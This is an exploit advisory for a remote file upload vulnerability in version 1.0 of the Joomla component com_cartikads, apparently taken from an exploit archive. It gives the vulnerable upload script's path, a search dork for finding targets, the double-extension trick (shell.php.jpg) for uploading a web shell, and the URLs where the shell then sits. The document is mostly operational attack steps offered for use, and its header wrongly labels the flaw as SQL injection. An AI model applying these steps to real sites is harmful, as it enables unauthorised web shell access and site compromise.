id: 10612
date: 01/04/2010
title: Joomla Component com_cartikads Remote File Upload Vulnerability
author: kaMtiEz
cves: 

===============================================================
Joomla Component com_cartikads Remote File Upload Vulnerability
===============================================================

###################################################################################
 
[ Software Information ]
 
[+] Vendor : http://www.cartikahosting.com
[+] Download : -
[+] version : 1.0
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : dunno           
[+] Location : INDONESIA - JOGJA
[+] description : Cartikads is a Mambo Open Source ads management component.
 
##################################################################################
 
 
[ HERE WE GO .. LIVE FROM JOGJA CITY ]
 
[ Vulnerable File ]
 
http://server/[kaMtiEz]/components/com_cartikads/uploadimage.php
 
[ NOTE ]
 
upload with extension shell.php.jpg
 
your shell will be
 
http://server/[kaMtiEz]/images/stories/shell.php.jpg
 
http://server/[kaMtiEz]/images/banners/shell.php.jpg
 
 
===========================================================================



#  0day.today [2023-03-21]  #